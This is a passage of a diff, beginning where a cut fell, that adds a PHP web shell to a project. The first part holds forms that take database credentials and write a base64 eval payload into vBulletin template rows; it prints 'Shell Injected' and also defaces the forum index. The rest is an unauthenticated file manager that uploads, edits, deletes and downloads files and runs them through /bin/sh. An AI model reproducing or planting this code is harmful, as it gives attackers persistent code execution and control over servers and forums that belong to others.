nBocCIpOw==';
+$template =$_POST['template'];
+@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());      
+@mysql_select_db($_POST['db']) or die(mysql_error());
+$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$code."\'))}}{\${exit()}}&' WHERE title ='".$template."'";
+$ka= @mysql_query($p) or die(mysql_error());
+if ($ka){print'Success <br> Shell Injected in '.$template;}
+}
+print $f;
+
+exit;
+case "VBindex":
+if (!$_POST[code]){
+print '
+<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = vb(document.frm.code.value)">
+Change index BY:<br><select size="1" name="t">
+<option value="spacer_open">SPACER_OPEN</option>
+<option value="spacer_close">SPACER_CLOSE</option>
+</select></p>
+<br> Host :<br><input name="lo" type="text" value="localhost" align="LEFT" size="18"/> 
+<br>DataBase Name: <br><input name="db" type="text"  align="LEFT" size="18" ><Br>
+<br>User Name :<br><input name="user" type="text"  align="LEFT" size="15">
+<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15">
+<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15">
+<br>index code[HTML]<br><textarea name="code" cols="41" rows="15" wrap="VIRTUAL" ></textarea><br>
+<input type="submit" value="Change index" />';
+}else{
+ $lost = $_POST[t];
+ $a ="{\${eval(base64_decode(\'";
+ $tkl_index = base64_encode('echo "'.$_POST[code].'</body></html>";exit;');
+@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());      
+@mysql_select_db($_POST['db']) or die(mysql_error());
+$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$tkl_index."\'))}}' WHERE title ='".$lost."'";
+$ka= @mysql_query($p) or die(mysql_error());
+if ($ka){print"Success ";}
+}
+print $f;
+exit;
+}
+}
+function dirTKL ($dir) {
+echo '<table><tr><td><u>filename</u></td><td><u>|</u></td><td><u></u></td><tr><td><textarea name="code" cols="20" rows="20" wrap="VIRTUAL">';
+foreach (glob("$dir/*.*") as $filename) {
+    $filename= str_replace("$dir/", "", $filename);
+		echo $filename.PHP_EOL;
+	}
+echo '</textarea></td></tr></table>';
+}
+hidTKL ();
+if (!$_GET['tool'] == ''){
+toolTKL ();
+}
+if ($_GET['tool'] == 'Files'){
+function getlist ($directory) {
+	global $delim, $win;
+	if ($d = @opendir($directory)) {
+		while (($filename = @readdir($d)) !== false) {
+			$path = $directory . $filename;
+			if ($stat = @lstat($path)) {
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+				if ($file['is_link']) $file['target'] = @readlink($path);
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+				$files[] = $file;
+			}
+		}
+		return $files;
+	} else {
+		return false;
+	}
+}
+function sortlist (&$list, $key, $reverse) {
+	quicksort($list, 0, sizeof($list) - 1, $key);
+	if ($reverse) $list = array_reverse($list);
+}
+function quicksort (&$array, $first, $last, $key) {
+	if ($first < $last) {
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+		$l = $first;
+		$r = $last;
+		while ($l <= $r) {
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+			if ($l <= $r) {
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+				$l++;
+				$r--;
+			}
+		}
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+	}
+}
+function permission_octal2string ($mode) {
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+	return $type . $owner . $group . $other;
+}
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+	return 'text/plain';
+}
+function del ($file) {
+	global $delim;
+	if (!@is_link($file) && !file_exists($file)) return false;
+	if (!@is_link($file) && @is_dir($file)) {
+		if ($dir = @opendir($file)) {
+			$error = false;
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+			if (!$error) return @rmdir($file);
+			return !$error;
+		} else {
+			return false;
+		}
+	} else {
+		return @unlink($file);
+	}
+}
+function addslash ($directory) {
+	global $delim;
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+}
+function relative2absolute ($string, $directory) {
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+}
+function path_is_relative ($path) {
+	global $win;
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+}
+function absolute2relative ($directory, $target) {
+	global $delim;
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+	return $path;
+}
+function simplify_path ($path) {
+	global $delim;
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+	$pattern  = $delim . '.' . $delim;
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	return $path;
+}
+function human_filesize ($filesize) {
+	$suffices = 'kMGTPE';
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+	return $filesize . " {$suffix}B";
+}
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+	html_header();
+	$list = getlist($directory);
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+	sortlist($list, $sort, $reverse);
+	echo '
+<form enctype="multipart/form-data" action="' . $self . '?tool=Files" method="post">
+<table id="main">
+';
+	directory_choice();
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+	echo '</table>
+</form>
+';
+	html_footer();
+}
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"></th>
+';
+	$d = 'tool=Files&dir=' . urlencode($directory) . '&amp;';
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+	if (!$win) {
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+	}
+	echo '	<th class="functions">' . word('functions') . '</th>
+</tr>
+';
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+		if ($file['is_link']) {
+	
+			echo html($file['filename']) . ' &rarr; ';
+			$real_file = relative2absolute($file['target'], $directory);
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?tool=Files&dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?tool=Files&action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+		} elseif ($file['is_dir']) {
+			echo ' [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?tool=Files&dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+		} else {
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '';
+			} else {
+				echo '';
+			}
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?tool=Files&action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+		}
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+		if (!$win) {
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?tool=Files&action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+			echo "</td>\n";
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+		}
+		echo '	<td class="functions">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'delete';
+			$actions[] = 'rename';
+			$actions[] = 'move';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'copy';
+			$actions[] = 'download';
+			if ($file['is_writable']) $actions[] = 'edit';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+		if (sizeof($actions) > 0) {
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+		}
+		echo '	</td>
+</tr>
+';
+	}
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'delete';
+		$actions[] = 'move';
+	}
+	$actions[] = 'copy';
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+}
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?tool=Files&dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+}
+function upload_box () {
+	global $cols;
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+}
+function create_box () {
+	global $cols;
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+}
+function edit ($file) {
+	global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
+	html_header();
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+<form action="' . $self . '?tool=Files" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+	echo '</textarea>
+	<hr />
+';
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+	<hr />
+';
+	}
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+	<hr />
+';
+	}
+	echo '
+	<input type="hidden" name="action" value="edit" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+</form>
+';
+	html_footer();
+}
+function spacer () {
+	global $cols;
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+}
+function textfieldsize ($content) {
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+	return $size;
+}
+function request_dump () {
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+}
+function html ($string) {
+	global $charset;
+	return htmlentities($string, ENT_COMPAT, $charset);
+}
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+}
+function getwords ($lang) {
+	global $word_charset, $date_format;
+	switch ($lang) {
+	case 'en':
+	default:
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Filename',
+'size' => 'Size',
+'permission' => 'Permission',
+'owner' => 'Owner',
+'group' => 'Group',
+'other' => 'Others',
+'functions' => 'Functions',
+'read' => 'read',
+'write' => 'write',
+'execute' => 'execute',
+'create_symlink' => 'create symlink',
+'delete' => 'delete',
+'rename' => 'rename',
+'move' => 'move',
+'copy' => 'copy',
+'edit' => 'edit',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'create',
+'change' => 'change',
+'save' => 'save',
+'set' => 'set',
+'reset' => 'reset',
+'relative' => 'Relative path to target',
+'yes' => 'Yes',
+'no' => 'No',
+'back' => 'back',
+'destination' => 'Destination',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+'user' => 'User',
+'password' => 'Password',
+'add' => 'add',
+'add_basic_auth' => 'add basic-authentification',
+'uploaded' => '"[%1]" has been uploaded.',
+'not_uploaded' => '"[%1]" could not be uploaded.',
+'already_exists' => '"[%1]" already exists.',
+'created' => '"[%1]" has been created.',
+'not_created' => '"[%1]" could not be created.',
+'really_delete' => 'Delete these files?',
+'deleted' => "These files have been deleted:\n[%1]",
+'not_deleted' => "These files could not be deleted:\n[%1]",
+'rename_file' => 'Rename file:',
+'renamed' => '"[%1]" has been renamed to "[%2]".',
+'not_renamed' => '"[%1] could not be renamed to "[%2]".',
+'move_files' => 'Move these files:',
+'moved' => "These files have been moved to \"[%2]\":\n[%1]",
+'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
+'copy_files' => 'Copy these files:',
+'copied' => "These files have been copied to \"[%2]\":\n[%1]",
+'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" can not be edited.',
+'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
+'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
+'saved' => '"[%1]" has been saved.',
+'not_saved' => '"[%1]" could not be saved.',
+'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
+'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
+'permission_for' => 'Permission of "[%1]":',
+'permission_set' => 'Permission of "[%1]" was set to [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" can not be read.'
+		);
+	}
+}
+function getimage ($image) {
+	
+}
+function html_header () {
+	
+
+}
+function html_footer () {
+	echo <<<END
+</body>
+</html>
+END;
+}
+function notice ($phrase) {
+	global $cols;
+	$args = func_get_args();
+	array_shift($args);
+	return '<tr id="notice"><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p><p>
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+}
+function error ($phrase) {
+	global $cols;
+	$args = func_get_args();
+	array_shift($args);
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+}
+
+
+////
+$homedir = './';
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+$delim = DIRECTORY_SEPARATOR;
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+$words = getwords($lang);
+$cols = ($win) ? 4 : 7;
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+switch ($action) {
+case 'view':
+	if (is_script($file)) {
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+<hr />
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+';
+		html_footer();
+	} else {
+		echo '<textarea name="code" cols="150" rows="50" wrap="VIRTUAL" >';
+		readfile($file);
+	}
+	break;
+case 'download':
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+	readfile($file);
+	break;
+case 'upload':
+	$dest = relative2absolute($file['name'], $directory);
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+	break;
+case 'create_directory':
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+	break;
+case 'create_file':
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			edit($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+	break;
+case 'execute':
+	chdir(dirname($file));
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+	$error = ($retval == 0) ? false : true;
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+	break;
+case 'delete':
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+		$failure = array();
+		$success = array();
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_deleted', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('deleted', implode("\n", $success));
+		}
+		listing_page($message);
+	} else {
+		html_header();
+		echo '<form action="' . $self . '?tool=Files" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+		request_dump();
+		echo "\t<b>" . word('really_delete') . '</b>
+	<p>
+';
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+';
+		html_footer();
+	}
